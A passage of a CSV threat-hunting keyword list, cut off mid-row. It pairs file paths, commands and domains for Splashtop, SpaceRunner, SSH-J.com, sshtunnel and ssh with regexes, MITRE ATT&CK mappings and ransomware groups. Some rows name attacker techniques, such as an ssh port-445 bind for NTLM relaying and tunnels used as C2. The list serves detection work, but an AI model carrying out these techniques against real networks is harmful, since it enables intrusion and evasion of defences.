"*apcfdffemoinopelidncddjbhkiblecc*",".{0,1000}apcfdffemoinopelidncddjbhkiblecc.{0,1000}","greyware_tool_keyword","Soul VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*/spacerunner.exe*",".{0,1000}\/spacerunner\.exe.{0,1000}","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","188","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\spacerunner.exe*",".{0,1000}\\spacerunner\.exe.{0,1000}","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","188","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*.api.splashtop.com*",".{0,1000}\.api\.splashtop\.com.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.relay.splashtop.com*",".{0,1000}\.relay\.splashtop\.com.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - 
Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Library/Logs/SPLog.txt*",".{0,1000}\/Library\/Logs\/SPLog\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/SplashtopStreamer/SPLog.txt*",".{0,1000}\/SplashtopStreamer\/SPLog\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\*",".{0,1000}\\slave\\workspace\\GIT_WIN_SRS_Formal\\Source\\irisserver\\.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Splashtop 
Remote\*",".{0,1000}\\Splashtop\sRemote\\.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Splashtop\Temp\*",".{0,1000}\\Splashtop\\Temp\\.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Splashtop\Temp\log\FTCLog.txt*",".{0,1000}\\Splashtop\\Temp\\log\\FTCLog\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SRService.exe*",".{0,1000}\\SRService\.exe.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - 
Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\strwinclt.exe*",".{0,1000}\\strwinclt\.exe.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\WOW6432Node\Splashtop Inc.\Splashtop Remote Server*",".{0,1000}\\WOW6432Node\\Splashtop\sInc\.\\Splashtop\sRemote\sServer.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*CurrentVersion\Uninstall\Splashtop Inc.\*",".{0,1000}CurrentVersion\\Uninstall\\Splashtop\sInc\.\\.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Program Files 
(x86)\Splashtop*",".{0,1000}Program\sFiles\s\(x86\)\\Splashtop.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Software\Splashtop Inc.\Splashtop*",".{0,1000}Software\\Splashtop\sInc\.\\Splashtop.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Splashtop Remote\Server\log\agent_log.txt*",".{0,1000}Splashtop\sRemote\\Server\\log\\agent_log\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Splashtop Remote\Server\log\SPLog.txt*",".{0,1000}Splashtop\sRemote\\Server\\log\\SPLog\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - 
Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Splashtop Remote\Server\log\svcinfo.txt*",".{0,1000}Splashtop\sRemote\\Server\\log\\svcinfo\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Splashtop Remote\Server\log\sysinfo.txt*",".{0,1000}Splashtop\sRemote\\Server\\log\\sysinfo\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Splashtop_Streamer_Windows_*.exe*",".{0,1000}Splashtop_Streamer_Windows_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Splashtop-Splashtop 
Streamer-*",".{0,1000}Splashtop\-Splashtop\sStreamer\-.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SplashtopStreamer.*.exe*",".{0,1000}SplashtopStreamer\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SplashtopStreamer3500.exe* prevercheck *",".{0,1000}SplashtopStreamer3500\.exe.{0,1000}\sprevercheck\s.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*www.splashtop.com/remotecaRemoveVRootsISCHECKFORPRODUCTUPDATES*",".{0,1000}www\.splashtop\.com\/remotecaRemoveVRootsISCHECKFORPRODUCTUPDATES.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black 
Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "ss -lntp*","ss\s\-lntp.{0,1000}","greyware_tool_keyword","ss","replace netstat command - service listening","T1049 - T1040","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*bad client public DH value*",".{0,1000}bad\sclient\spublic\sDH\svalue.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "*Corrupted MAC on input*",".{0,1000}Corrupted\sMAC\son\sinput.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "*error in libcrypto*",".{0,1000}error\sin\slibcrypto.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive 
!","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "*fatal: buffer_get_string: bad string*",".{0,1000}fatal\:\sbuffer_get_string\:\sbad\sstring.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "*invalid certificate signing key*",".{0,1000}invalid\scertificate\ssigning\skey.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "*invalid elliptic curve value*",".{0,1000}invalid\selliptic\scurve\svalue.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "*Local: crc32 compensation attack*",".{0,1000}Local\:\scrc32\scompensation\sattack.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - 
TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "*nano /etc/ssh/sshd_config*",".{0,1000}nano\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","ssh","modification of the sshd configuration file - could be an attacker establishing persistence or a legitimate admin behavior","T1059.004 - T1078 - T1053","TA0005 - TA0003 - TA0006","N/A","N/A","Persistence","https://x.com/mthcht/status/1827714529687658796","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*ssh.exe -L 0.0.0.0:445:127.0.0.1:445 *",".{0,1000}ssh\.exe\s\-L\s0\.0\.0\.0\:445\:127\.0\.0\.1\:445\s.{0,1000}","greyware_tool_keyword","ssh","Binding to port 445 on Windows with ssh - useful for NTLM relaying","T1090.002 - T1071.001","TA0008","N/A","N/A","Lateral Movement","https://x.com/0x64616e/status/1817149974724956286","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*unexpected bytes remain after decoding*",".{0,1000}unexpected\sbytes\sremain\safter\sdecoding.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "*vim /etc/ssh/sshd_config*",".{0,1000}vim\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","ssh","modification of the sshd configuration file - could be an attacker establishing persistence or a legitimate admin behavior","T1059.004 - T1078 - T1053","TA0005 - TA0003 - 
TA0006","N/A","N/A","Persistence","https://x.com/mthcht/status/1827714529687658796","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*/dropbear-sshj.git*",".{0,1000}\/dropbear\-sshj\.git.{0,1000}","greyware_tool_keyword","SSH-J.com","This is Dropbear SSH server modified to be used as a public SSH jump & port forwarding service","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://bitbucket.org/ValdikSS/dropbear-sshj/src/master/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ssh *@ssh-j.com*",".{0,1000}ssh\s.{0,1000}\@ssh\-j\.com.{0,1000}","greyware_tool_keyword","SSH-J.com","This is Dropbear SSH server modified to be used as a public SSH jump & port forwarding service","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://bitbucket.org/ValdikSS/dropbear-sshj/src/master/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*sshjmpnoutfqotbj6r3acexiwoalgkth55y5kys7js3px2qqqrwuhqqd.onion*",".{0,1000}sshjmpnoutfqotbj6r3acexiwoalgkth55y5kys7js3px2qqqrwuhqqd\.onion.{0,1000}","greyware_tool_keyword","SSH-J.com","This is Dropbear SSH server modified to be used as a public SSH jump & port forwarding service","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://bitbucket.org/ValdikSS/dropbear-sshj/src/master/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ValdikSS/dropbear-sshj*",".{0,1000}ValdikSS\/dropbear\-sshj.{0,1000}","greyware_tool_keyword","SSH-J.com","This is Dropbear SSH server modified to be used as a public SSH jump & port forwarding service","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://bitbucket.org/ValdikSS/dropbear-sshj/src/master/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* install -c conda-forge 
sshtunnel*",".{0,1000}\sinstall\s\-c\sconda\-forge\ssshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "* -m sshtunnel *",".{0,1000}\s\-m\ssshtunnel\s.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "* sshtunnel.py*",".{0,1000}\ssshtunnel\.py.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "* SSHTunnelForwarder(*",".{0,1000}\sSSHTunnelForwarder\(.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*/sshtunnel -*",".{0,1000}\/sshtunnel\s\-.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*/sshtunnel.git*",".{0,1000}\/sshtunnel\.git.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" 
"*/sshtunnel.py*",".{0,1000}\/sshtunnel\.py.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*/sshtunnel/tarball/*",".{0,1000}\/sshtunnel\/tarball\/.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*/sshtunnel/zipball/*",".{0,1000}\/sshtunnel\/zipball\/.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*\sshtunnel.py*",".{0,1000}\\sshtunnel\.py.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*c89b4490de04897b1c16e5dae1c10ef10e60c56294bd4ca45d1669f5dcb6f9e3*",".{0,1000}c89b4490de04897b1c16e5dae1c10ef10e60c56294bd4ca45d1669f5dcb6f9e3.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","#filehash","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*Creating SSHTunnelForwarder*paramiko*",".{0,1000}Creating\sSSHTunnelForwarder.{0,1000}paramiko.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*easy_install sshtunnel*",".{0,1000}easy_install\ssshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*from sshtunnel import *",".{0,1000}from\ssshtunnel\simport\s.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*from sshtunnel import SSHTunnelForwarder*",".{0,1000}from\ssshtunnel\simport\sSSHTunnelForwarder.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*import sshtunnel*",".{0,1000}import\ssshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","0","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*pahaz/sshtunnel*",".{0,1000}pahaz\/sshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://github.com/pahaz/sshtunnel","1","1","N/A","N/A","10","10","1213","184","2024-03-10T15:20:42Z","2014-06-11T21:14:05Z" "*pip install sshtunnel*",".{0,1000}pip\sinstall\ssshtunnel.{0,1000}","greyware_tool_keyword","sshtunnel","SSH tunnels to remote server","T1572 - T1219","TA0005 - 
